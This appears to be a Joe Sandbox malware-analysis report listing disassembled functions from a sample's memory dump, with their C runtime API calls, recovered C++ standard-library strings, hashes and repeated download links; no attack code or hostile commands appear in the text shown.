Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
API String ID: 0-2144588626
Opcode ID: 92b7329270e53ff97e577b768c53ed15714b72b2be74af88e6977060e2dbc436
Instruction ID: ee2cfbb4fe06b5d2cec631012cd0f2e303ee764c4ee6ecb3feaaea01b414d9ac
Opcode Fuzzy Hash: 92b7329270e53ff97e577b768c53ed15714b72b2be74af88e6977060e2dbc436
Instruction Fuzzy Hash: E8E18022E05B8684FB60BF25D940379A360EB56B9CF988271CF4D1B799EF38D485C760

Function 00007FF729FA4460 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C50F0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C50FD

Part of subcall function 00007FF72A0C45E0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF72A0C66D3,?,?,?,?,00007FF72A074BA7,?,?,?,?,00007FF72A072262), ref: 00007FF72A0C45EF

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C51FA
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C520C
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5220
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232

Strings

what(): , xrefs: 00007FF72A0C51F3

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: abort$fputcfputsfreefwritemalloc
String ID: what():
API String ID: 1809443324-593870882
Opcode ID: 87408ad0603ee8c41e1c4c8ef6072651e9f498a21ed56660e3a7948d2144ccf6
Instruction ID: 1603cc95863f0f90d0f26ea46a7e5182323b464a3101998949101579f942206f
Opcode Fuzzy Hash: 87408ad0603ee8c41e1c4c8ef6072651e9f498a21ed56660e3a7948d2144ccf6
Instruction Fuzzy Hash: E7312114E0D61340FAA4BFA5AC662BDD166EF45B80FC40475E90E473C3ED1DF2015A71

Function 00007FF72A025410 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A025455
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A025636

Part of subcall function 00007FF72A0260C0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF72A024C42,?,?,?,?,?,?,?,00007FF72A024728), ref: 00007FF72A02613B

Strings

basic_string::_M_replace_aux, xrefs: 00007FF72A025476
basic_string::insert, xrefs: 00007FF72A02571D, 00007FF72A02572C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A025733

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy$memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 438689982-1339558951
Opcode ID: 6c96ead74b821af78bfc087cc1d54b1b06c1ab8aa585e92059c8ef8ef73b6b55
Instruction ID: 20488de40e7a64bc7762cb9bcfc53571c65adaaf27b6b929b69b436e6f12cbc2
Opcode Fuzzy Hash: 6c96ead74b821af78bfc087cc1d54b1b06c1ab8aa585e92059c8ef8ef73b6b55
Instruction Fuzzy Hash: 0F51B162B4979342FA317B6A9D640BC9251DF01FD4FD841B2DE0C077D2ED2DE5828B24

Function 00007FF729FD5E60 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 240stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FD5E93
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FD5F13

Strings

basic_string: construction from null is not valid, xrefs: 00007FF729FD601E, 00007FF729FD606E, 00007FF729FD60BE
basic_string: construction from null is not valid, xrefs: 00007FF729FD5EC7, 00007FF729FD5F47, 00007FF729FD5FC7

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: b298e40e8326073e78d25982d3ccf826324563d84e6940b60b221b93fb5c4db7
Instruction ID: 7027c460457cd2d9ea0882003f218bd53f75b2e48839dd89099c8ebd167ead77
Opcode Fuzzy Hash: b298e40e8326073e78d25982d3ccf826324563d84e6940b60b221b93fb5c4db7
Instruction Fuzzy Hash: 6C515362B59B1641EE65BF16EC500ECA321EB48F94BC90472DD0D0B765EE3CEA87D720

Function 00007FF72A01C400 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A01C6BC

Part of subcall function 00007FF72A01D1B0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF72A01BBF2,?,?,?,?,?,?,?,00007FF72A01B5FB), ref: 00007FF72A01D23A

Strings

basic_string::_M_replace_aux, xrefs: 00007FF72A01C4A7
basic_string::insert, xrefs: 00007FF72A01C7AF, 00007FF72A01C7BE
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A01C7C5

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 3510742995-1339558951
Opcode ID: 3ada918f618b113a2234eeefa80287dd0a0b795f4b7cdc26a74a5f7f64d380be
Instruction ID: 8e591b9d8321af9c87d0447b663d201a516132b4394617db80c508cca9b2b5c8
Opcode Fuzzy Hash: 3ada918f618b113a2234eeefa80287dd0a0b795f4b7cdc26a74a5f7f64d380be
Instruction Fuzzy Hash: DC51C062B1965380FF21AF599C441F8A261EF44BD4FD86572DE0D077A0FE2CE581E724

Function 00007FF729F8DC60 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950b7e3b902e3005726fa7422c4e82cab78e5ea81468337b0ea846abdafc24b4
Instruction ID: 9f83ba2154c57df5e79ed51ae1b6f2618202a94d0202128221af47193b1a6b10
Opcode Fuzzy Hash: 950b7e3b902e3005726fa7422c4e82cab78e5ea81468337b0ea846abdafc24b4
Instruction Fuzzy Hash: 29418D22B0AA1295FA95BF15EC501B8E271FF44B90FCC8035DA0E17781EE3CEA41DB60

Function 00007FF729FC5560 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 215stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FC558A
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FC55A8
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FC5636
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FC56B8

Part of subcall function 00007FF72A0B4720: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FF72A0752C1), ref: 00007FF72A0B473B

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FC5764

Strings

basic_string::compare, xrefs: 00007FF729FC55E2, 00007FF729FC566C, 00007FF729FC56EE, 00007FF729FC579A, 00007FF729FC57B3
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF729FC55E9, 00007FF729FC5673, 00007FF729FC56F5, 00007FF729FC57A1, 00007FF729FC57BA

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: c3f8e34cbadc5922aa6d578a049dc2a96b10d5c1a97c5d12a9bc863ee77ab2cf
Instruction ID: a579d0529a42804a64d8ba098fa03edfdce875f367f6555813329edf71e11fd2
Opcode Fuzzy Hash: c3f8e34cbadc5922aa6d578a049dc2a96b10d5c1a97c5d12a9bc863ee77ab2cf
Instruction Fuzzy Hash: 7051E492F0968681FE50AF26EE002E49251DF15BE4F9C8632EF2C577D1ED1DEB819610

Function 00007FF729FCE140 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 155stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72A0242D0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72A035B81), ref: 00007FF72A0242FC

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCE195
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCE1AB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCE1EE
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCE250
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCE2BA
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCE31E

Strings

*, xrefs: 00007FF729FCE357

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: d8eb6cb4a8127c538fd93f4871f03824c6f3b091d3f30b42475bafe145940934
Instruction ID: 96b2f93fc8d72dd4d2c2564ea0820451d83846851f1b1a3fec8f13f4f140b0b6
Opcode Fuzzy Hash: d8eb6cb4a8127c538fd93f4871f03824c6f3b091d3f30b42475bafe145940934
Instruction Fuzzy Hash: D751A96AB04B4681FB40EF16D9143AEA7A1EB85FC4F888032DF0D477A5DE3DEA058750

Function 00007FF72A0C4930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C51FA
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C520C
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5220
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232

Strings

what(): , xrefs: 00007FF72A0C51F3

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: abortfputcfputsfreefwrite
String ID: what():
API String ID: 2053421089-593870882
Opcode ID: c528ee2ce49b360b72438cb081527c563e46c736580d453792cfc8967ffed01f
Instruction ID: 09405233d80847427d90a222c7659cd962a82fa1b3da5c26d3ed2d820a47688f
Opcode Fuzzy Hash: c528ee2ce49b360b72438cb081527c563e46c736580d453792cfc8967ffed01f
Instruction Fuzzy Hash: BF513C50E0861740FBA0BF66AC252B9D266EF45B84FC840B1ED0E472D3EE2DF6019B71

Function 00007FF72A0C48B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C51FA
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C520C
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5220
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232

Strings

what(): , xrefs: 00007FF72A0C51F3

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: abortfputcfputsfreefwrite
String ID: what():
API String ID: 2053421089-593870882
Opcode ID: dd95f357a4430578beb0252bc8786d15c49c00d4cf43d9fcea23fa1b758f070e
Instruction ID: fc7f747994b2ebc4be626128bfe954a4701f623bc82f203196dd06f3a66887e5
Opcode Fuzzy Hash: dd95f357a4430578beb0252bc8786d15c49c00d4cf43d9fcea23fa1b758f070e
Instruction Fuzzy Hash: 2B310A50E1861340FBA0BF669C6A2BD9266EF45B80FC44075D90E472D7FE1CF6019B71

Function 00007FF72A0C4A30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C51FA
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C520C
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5220
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232

Strings

what(): , xrefs: 00007FF72A0C51F3

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: abortfputcfputsfreefwrite
String ID: what():
API String ID: 2053421089-593870882
Opcode ID: 35465102c53ad2bbfa59efcb14e74ca727752e57fb88d1b05f5bc27f5b67ac44
Instruction ID: 01520033938ad3ec9cabe61d0b975800866a40f80badf22e824388891f4bc6d6
Opcode Fuzzy Hash: 35465102c53ad2bbfa59efcb14e74ca727752e57fb88d1b05f5bc27f5b67ac44
Instruction Fuzzy Hash: AA314B50E0861340FBA0BB66AC6A3BD9266EF45B80FC44075D90E473D3FE1CE6019B71

Function 00007FF729F9B3F9 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 75COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F9B532

Strings

thread , xrefs: 00007FF729F9B464
eaning u, xrefs: 00007FF729F9B436
eys for , xrefs: 00007FF729F9B452
Error cl, xrefs: 00007FF729F9B42C
p spin_k, xrefs: 00007FF729F9B448

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: abort
String ID: Error cl$eaning u$eys for $p spin_k$thread
API String ID: 4206212132-3545615192
Opcode ID: 07ddf223fce23e3bbbdea389a97b49fa8b6e2c9f00ae33dc74b79853caab605a
Instruction ID: 9b60a16017f6cea8bfc395137bb71e5a14f7a80688f3cd0be89f0d88e121df04
Opcode Fuzzy Hash: 07ddf223fce23e3bbbdea389a97b49fa8b6e2c9f00ae33dc74b79853caab605a
